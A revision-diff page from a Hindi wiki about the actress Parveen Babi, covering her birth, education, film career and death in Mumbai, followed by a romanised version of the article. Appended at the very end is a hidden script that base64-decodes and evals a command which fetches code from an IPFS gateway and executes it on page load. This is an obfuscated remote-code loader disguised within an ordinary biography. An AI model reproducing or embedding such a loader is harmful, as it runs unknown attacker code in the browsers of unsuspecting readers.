Difference between revisions of "परवीन बाबी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "आवाज " to "आवाज़ ")
Line 1: Line 1:
[[चित्र:Parveen-Babi.jpg|thumb|220px|परवीन बाबी]]
+
{{सूचना बक्सा कलाकार
परवीन बाबी (जन्म: [[4 अप्रैल]] [[1949]] - मृत्यु: [[20 जनवरी]] [[2005]]) हिन्दी फ़िल्मों की एक प्रसिद्ध भारतीय अभिनेत्री हैं। परवीन बाबी ग्लैमरस भूमिकाओं के लिए जानी जाती थीं। [[1970]]-[[1980|80]] के दशक में सिल्वर स्क्रीन पर अपनी सुन्दरता का जलवा बिखरने वाली परवीन बाबी की ज़्यादातर फ़िल्में सुपर हिट रहीं हैं।
+
|चित्र=Parveen-Babi.jpg
 +
|चित्र का नाम=परवीन बाबी
 +
|पूरा नाम=परवीन बाबी
 +
|प्रसिद्ध नाम=
 +
|अन्य नाम=
 +
|जन्म=[[4 अप्रैल]] [[1949]]
 +
|जन्म भूमि=[[जूनागढ़]], [[गुजरात]]
 +
|मृत्यु= [[20 जनवरी]] [[2005]]
 +
|मृत्यु स्थान=[[मुम्बई]], [[महाराष्ट्र]]
 +
|अविभावक=मोहम्मद बाबी
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=मुम्बई
 +
|कर्म-क्षेत्र=अभिनेत्री
 +
|मुख्य रचनाएँ=
 +
|मुख्य फ़िल्में=[[दीवार (फ़िल्म)|दीवार]], अमर अकबर एंथनी, शान, नमक हलाल, मजबूर आदि
 +
|विषय=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=[[अमिताभ बच्चन]] के साथ परवीन बाबी ने क़रीब आठ फ़िल्मों में काम किया और दर्शकों ने उनकी जोड़ी को खूब पसंद किया।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''परवीन बाबी''' (अंग्रेज़ी: ''Parveen Babi'', जन्म: [[4 अप्रैल]] [[1949]] - मृत्यु: [[20 जनवरी]] [[2005]]) हिन्दी फ़िल्मों की एक प्रसिद्ध भारतीय [[अभिनेत्री]] थीं। परवीन बाबी ग्लैमरस भूमिकाओं के लिए जानी जाती थीं। [[1970]]-[[1980|80]] के दशक में सिल्वर स्क्रीन पर अपनी सुन्दरता का जलवा बिखरने वाली परवीन बाबी की ज़्यादातर फ़िल्में सुपर हिट रहीं हैं।
 
==जन्म और शिक्षा==
 
==जन्म और शिक्षा==
 
परवीन बाबी का जन्म 4 अप्रैल 1949 को [[जूनागढ़]], [[गुजरात]] में हुआ था। परवीन अपने माता-पिता की शादी के चौदह साल बाद पैदा हुई थीं और यह इकलौती संतान थीं। उन्होंने अपने पिता को सात साल की उम्र में ही खो दिया था। परवीन बाबी ने [[औरंगाबाद महाराष्ट्र|औरंगाबाद]] में अपनी प्रारम्भिक स्कूली शिक्षा की और उसके बाद सेंट जेवियर्स कॉलेज, [[अहमदाबाद]] से शिक्षा ग्रहण की। उनके पिता वली मोहम्मद बाबी, जूनागढ़ के नवाब के साथ प्रशासक थे।
 
परवीन बाबी का जन्म 4 अप्रैल 1949 को [[जूनागढ़]], [[गुजरात]] में हुआ था। परवीन अपने माता-पिता की शादी के चौदह साल बाद पैदा हुई थीं और यह इकलौती संतान थीं। उन्होंने अपने पिता को सात साल की उम्र में ही खो दिया था। परवीन बाबी ने [[औरंगाबाद महाराष्ट्र|औरंगाबाद]] में अपनी प्रारम्भिक स्कूली शिक्षा की और उसके बाद सेंट जेवियर्स कॉलेज, [[अहमदाबाद]] से शिक्षा ग्रहण की। उनके पिता वली मोहम्मद बाबी, जूनागढ़ के नवाब के साथ प्रशासक थे।
 
==फ़िल्मी जीवन==
 
==फ़िल्मी जीवन==
[[1972]] में परवीन के मॉडलिंग करियर की शुरुआत हुई। उम्र की पाँच दशक पार कर इस दुनिया से विदा लेने वाली परवीन का फ़िल्मी कैरियर [[1973]] में 'चरित्र' से शुरू हुआ था। इसके बाद आई- चरित्रहीन , जिसमें सलीम दुर्रानी की प्रमुख भूमिका थी। बहरहाल जिस फ़िल्म ने उन्हें प्रसिद्धि के प्रकाश वृत्त में ला खड़ा किया वह थी, दीवार। परवीन की अदाकारी की श्रेष्ठता के लिए केवल इतना कहना ही काफ़ी है कि उन्हें क़रीब 10 फ़िल्मों में [[कला]] के उत्कृष्ट प्रदर्शन के लिए सम्मानित किया गया। इनमें मजबूर, [[दीवार (फ़िल्म)|दीवार]], अमर अकबर एंथनी, सुहाग, कालिया, मेरी आवाज़ सुनो, नमक हलाल, अशांति, खुद्दार, रंग बिरंगी आदि शामिल हैं। बहरहाल ये तो चंद फ़िल्मों के नाम हैं। परवीन की अन्य फ़िल्में भी कुछ कम नहीं हैं और कुछ में तो उन पर फ़िल्माए गए एक गाने ने ही धूम मचा दी। [[अमिताभ बच्चन]] के साथ परवीन ने क़रीब आठ फ़िल्मों में काम किया और दर्शकों ने उनकी जोड़ी को खूब पसंद किया।<ref>{{cite web |url=http://navbharattimes.indiatimes.com/articleshow/998543.cms |title=एक्ट्रेस परवीन बाबी की संदिग्ध हालत में मौत |accessmonthday=27 जनवरी |accessyear=2012 |last= |first= |authorlink= |format= |publisher=नवभारत टाइम्स |language=हिन्दी }}</ref>
+
[[1972]] में परवीन के मॉडलिंग करियर की शुरुआत हुई। उम्र की पाँच दशक पार कर इस दुनिया से विदा लेने वाली परवीन का फ़िल्मी कैरियर [[1973]] में 'चरित्र' से शुरू हुआ था। इसके बाद आई- चरित्रहीन, जिसमें सलीम दुर्रानी की प्रमुख भूमिका थी। बहरहाल जिस फ़िल्म ने उन्हें प्रसिद्धि के प्रकाश वृत्त में ला खड़ा किया वह थी, दीवार। परवीन की अदाकारी की श्रेष्ठता के लिए केवल इतना कहना ही काफ़ी है कि उन्हें क़रीब 10 फ़िल्मों में [[कला]] के उत्कृष्ट प्रदर्शन के लिए सम्मानित किया गया। इनमें मजबूर, [[दीवार (फ़िल्म)|दीवार]], अमर अकबर एंथनी, सुहाग, कालिया, मेरी आवाज़ सुनो, नमक हलाल, अशांति, खुद्दार, रंग बिरंगी आदि शामिल हैं। बहरहाल ये तो चंद फ़िल्मों के नाम हैं। परवीन की अन्य फ़िल्में भी कुछ कम नहीं हैं और कुछ में तो उन पर फ़िल्माए गए एक गाने ने ही धूम मचा दी। [[अमिताभ बच्चन]] के साथ परवीन ने क़रीब आठ फ़िल्मों में काम किया और दर्शकों ने उनकी जोड़ी को खूब पसंद किया।<ref>{{cite web |url=http://navbharattimes.indiatimes.com/articleshow/998543.cms |title=एक्ट्रेस परवीन बाबी की संदिग्ध हालत में मौत |accessmonthday=27 जनवरी |accessyear=2012 |last= |first= |authorlink= |format= |publisher=नवभारत टाइम्स |language=हिन्दी }}</ref>
 
==निधन==
 
==निधन==
परवीन बाबी का निधन [[20 जनवरी]], [[2005]] को हुआ था।  
+
परवीन बाबी का निधन [[20 जनवरी]], [[2005]] को [[मुम्बई]] में हुआ था।  
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
+
 
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{अभिनेत्री}}
 
{{अभिनेत्री}}

Revision as of 10:37, 20 January 2013

paravin babi
poora nam paravin babi
janm 4 aprail 1949
janm bhoomi joonagadh, gujarat
mrityu 20 janavari 2005
mrityu sthan mumbee, maharashtr
karm bhoomi mumbee
karm-kshetr abhinetri
mukhy filmean divar, amar akabar eanthani, shan, namak halal, majaboor adi
nagarikata bharatiy
any janakari amitabh bachchan ke sath paravin babi ne qarib ath filmoan mean kam kiya aur darshakoan ne unaki jo di ko khoob pasand kiya.

paravin babi (aangrezi: Parveen Babi, janm: 4 aprail 1949 - mrityu: 20 janavari 2005) hindi filmoan ki ek prasiddh bharatiy abhinetri thian. paravin babi glaimaras bhoomikaoan ke lie jani jati thian. 1970-80 ke dashak mean silvar skrin par apani sundarata ka jalava bikharane vali paravin babi ki zyadatar filmean supar hit rahian haian.

janm aur shiksha

paravin babi ka janm 4 aprail 1949 ko joonagadh, gujarat mean hua tha. paravin apane mata-pita ki shadi ke chaudah sal bad paida huee thian aur yah ikalauti santan thian. unhoanne apane pita ko sat sal ki umr mean hi kho diya tha. paravin babi ne aurangabad mean apani prarambhik skooli shiksha ki aur usake bad seant jeviyars k aaulej, ahamadabad se shiksha grahan ki. unake pita vali mohammad babi, joonagadh ke navab ke sath prashasak the.

filmi jivan

1972 mean paravin ke m aaudaliang kariyar ki shuruat huee. umr ki paanch dashak par kar is duniya se vida lene vali paravin ka filmi kairiyar 1973 mean 'charitr' se shuroo hua tha. isake bad aee- charitrahin, jisamean salim durrani ki pramukh bhoomika thi. baharahal jis film ne unhean prasiddhi ke prakash vritt mean la kh da kiya vah thi, divar. paravin ki adakari ki shreshthata ke lie keval itana kahana hi kafi hai ki unhean qarib 10 filmoan mean kala ke utkrisht pradarshan ke lie sammanit kiya gaya. inamean majaboor, divar, amar akabar eanthani, suhag, kaliya, meri avaz suno, namak halal, ashaanti, khuddar, rang birangi adi shamil haian. baharahal ye to chand filmoan ke nam haian. paravin ki any filmean bhi kuchh kam nahian haian aur kuchh mean to un par filmae ge ek gane ne hi dhoom macha di. amitabh bachchan ke sath paravin ne qarib ath filmoan mean kam kiya aur darshakoan ne unaki jo di ko khoob pasand kiya.[1]

nidhan

paravin babi ka nidhan 20 janavari, 2005 ko mumbee mean hua tha.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. ektres paravin babi ki sandigdh halat mean maut (hindi) navabharat taims. abhigaman tithi: 27 janavari, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>